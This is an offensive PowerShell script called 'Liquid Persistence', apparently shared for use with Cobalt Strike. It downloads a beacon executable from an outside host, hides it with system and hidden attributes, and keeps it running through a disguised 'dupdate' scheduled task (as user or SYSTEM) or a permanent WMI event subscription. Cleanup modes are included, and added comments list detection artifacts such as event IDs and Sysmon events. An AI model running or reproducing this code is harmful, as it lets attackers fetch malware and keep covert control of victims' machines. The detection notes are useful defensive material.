Liquid Persistence
Posted: 01-28-2025
Language: Powershell
param (
# Selects which arm of the switch below runs. Accepted values are the six
# listed in the usage comments that follow; anything else reaches `default`.
[string]$mode
)
# Liquid Persistence
# Author: Trigat
# This works well with Cobalt Strike and other beacons.
# Create and host a beacon name such as dupdate.exe.
# Within Cobalt Strike, navigate to Site Management > Host File.
# Host with domain name or IP: http://domain.com:80/dupdate.exe
# Use Cobalt Strike to upload the script.
# beacon> upload C:\liquid.ps1
# Execute with one of the following arguments:
# task = Schedule task as non-elevated user
# tasksystem = Schedule task as System user
# taskrun = Run scheduled task immediately
# taskclean = Remove scheduled task
# wmi = WMI Event Subscription as System user
# wmiclean = Remove WMI Event Subscription
# Example Cobalt Strike command with argument:
# beacon> shell powershell -ExecutionPolicy Bypass -File "C:\liquid.ps1" wmi -Verb RunAs
# Example PowerShell command with argument:
# .\liquid.ps1 wmi
#### UPDATE BEACON PATH AND NAME ####
# $bPath is the URL the executable is fetched from; $bName is the file name
# it is written under inside the directory each install arm chooses.
$bPath = "https://trigat.com:443/beacon.exe"
$bName = "beacon.exe"
# Defender note: the three install arms (task, tasksystem, wmi) share the
# same observable sequence -- a System.Net.WebClient download of $bPath, a
# new file marked system+hidden with attrib, and a registration named
# 'dupdate' (a scheduled task or a trio of root/subscription WMI objects).
# The two *clean arms undo one mechanism each and delete the dropped file.
switch ($mode) {
"task" {
# Command to run as Non-Administrator
# Drops the file into the world-writable Public folder. TLS 1.2 is forced
# on ServicePointManager before the WebClient call.
$dPath = "c:\users\public\$bName"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile($bPath, $dPath)
# Hide the dropped file from default directory listings (system + hidden).
attrib +s +h $dPath
# Assigned but not referenced anywhere else in this arm.
$UserName = [System.Environment]::UserName
# Registers a task named 'dupdate' that runs powershell.exe every 3 minutes
# from now; the inline -Command starts $dPath unless a process named
# 'dupdate' (the literal in $DUP) is already running. No -Principal is
# supplied, so the task runs under the registering user's account.
# Detection: task creation is logged in Microsoft-Windows-TaskScheduler/
# Operational and, with object-access auditing enabled, as Security 4698;
# the recurring powershell.exe launch with a -Command argument is the
# runtime artifact.
$DUP = 'dupdate'; $HM = "-Command `"if (!(Get-Process -Name $DUP -ErrorAction SilentlyContinue)) { Start-Process '$dPath' }`""; $N = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $HM; $TR = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3); $S = New-ScheduledTaskSettingsSet; $ST = New-ScheduledTask -Action $N -Trigger $TR -Settings $S; Register-ScheduledTask dupdate -InputObject $ST;
}
"tasksystem" {
# Command to run as Administrator
# Same download as the task arm, but the file lands under the
# NetworkService profile; writing there presumably needs elevation (the
# header's -Verb RunAs example points the same way) -- not verified here.
$dPath = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile($bPath, $dPath)
# Hide the dropped file (system + hidden attributes).
attrib +s +h $dPath
# Same 'dupdate' task as above with two differences: an explicit principal
# of NT AUTHORITY\SYSTEM (LogonType ServiceAccount, RunLevel Highest) and a
# 2-minute repetition interval. Detection artifacts are the same as the
# task arm, plus a SYSTEM-owned task whose action is powershell.exe.
$DUP = 'dupdate'; $HM = "-Command `"if (!(Get-Process -Name $DUP -ErrorAction SilentlyContinue)) { Start-Process '$dPath' }`""; $U = "NT AUTHORITY\SYSTEM"; $R = "Highest"; $SA = "ServiceAccount"; $P = New-ScheduledTaskPrincipal -UserID $U -LogonType $SA -RunLevel $R; $N = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $HM; $TR = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2); $S = New-ScheduledTaskSettingsSet; $ST = New-ScheduledTask -Action $N -Trigger $TR -Settings $S -Principal $P; Register-ScheduledTask dupdate -InputObject $ST;
}
"taskrun" {
# Run scheduled task
# Triggers the 'dupdate' task on demand and echoes whatever
# Start-ScheduledTask returned.
$DU = "dupdate"; $BN = Start-ScheduledTask -TaskName $DU; $BN
}
"taskclean" {
# Remove Task
# Unregisters the task without prompting, then removes the dropped file
# from both candidate locations (task and tasksystem drop to different
# directories, so both are checked).
unregister-ScheduledTask -TaskName "dupdate" -Confirm:$false
$dPath1 = "c:\users\public\$bName"
$dPath2 = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName"
# Function to remove attributes and delete file
# Clears the system/hidden attributes first because Remove-Item -Force is
# applied only after attrib succeeds. Prints one line per path either way.
# NOTE: an identical copy of this function is defined in the wmiclean arm.
function Remove-File {
param (
[string]$filePath
)
if (Test-Path $filePath) {
# Remove hidden and system attributes
attrib -s -h $filePath
# Delete the file
Remove-Item $filePath -Force
Write-Host "Deleted: $filePath"
}
else {
Write-Host "File not found: $filePath"
}
}
# Check both paths
Remove-File -filePath $dPath1
Remove-File -filePath $dPath2
}
"wmi" {
# WMI Event Subscription
# Same download and hide steps as the tasksystem arm.
$dPath = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile($bPath, $dPath)
attrib +s +h $dPath
# Builds a permanent WMI event subscription in root/subscription, all three
# objects named 'dupdate':
#   - __EventFilter: polls (WITHIN 60) for Win32_PerfFormattedData_PerfOS_System
#     modifications where SystemUpTime is in [240, 325) seconds, i.e. a
#     window roughly 4-5 minutes after each boot;
#   - CommandLineEventConsumer: CommandLineTemplate is $dPath, so the
#     dropped file is what gets executed;
#   - __FilterToConsumerBinding: ties the two together.
# Detection: enumerate root/subscription for __EventFilter,
# CommandLineEventConsumer and __FilterToConsumerBinding instances; Sysmon
# records their creation as events 19/20/21, and Microsoft-Windows-WMI-
# Activity/Operational logs permanent-consumer registration (event 5861).
$FilterArgs = @{name='dupdate'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; $Filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs; $ConsumerArgs = @{name='dupdate'; CommandLineTemplate="$dPath";}; $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs; $FilterToConsumerArgs = @{Filter = [Ref] $Filter; Consumer = [Ref] $Consumer}; $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
}
"wmiclean" {
# Remove WMI Event Subscription
# Looks up the consumer and filter by Name = 'dupdate', then finds the
# binding via a REFERENCES OF query on the consumer's __RELPATH. Uses the
# legacy Get-WmiObject/Remove-WmiObject cmdlets, whereas the wmi arm used
# the CIM cmdlets -- both address the same root/subscription objects.
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'dupdate'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'dupdate'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
# Binding is removed first, then the consumer and filter it referenced.
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
# Only the tasksystem/wmi drop location is cleaned up here.
$dPath = "C:\Windows\ServiceProfiles\NetworkService\AppData\Local\$bName";
# Function to remove attributes and delete file
# Duplicate of the Remove-File defined in the taskclean arm.
function Remove-File {
param (
[string]$filePath
)
if (Test-Path $filePath) {
# Remove hidden and system attributes
attrib -s -h $filePath
# Delete the file
Remove-Item $filePath -Force
Write-Host "Deleted: $filePath"
}
else {
Write-Host "File not found: $filePath"
}
}
# Remove the dropped file (single path in this arm)
Remove-File -filePath $dPath
}
default {
# Unknown $mode: print the accepted values and fail with exit status 1.
Write-Host "Invalid mode specified. Use 'task', 'tasksystem', 'taskrun', 'taskclean', 'wmi', or 'wmiclean'"
exit 1
}
}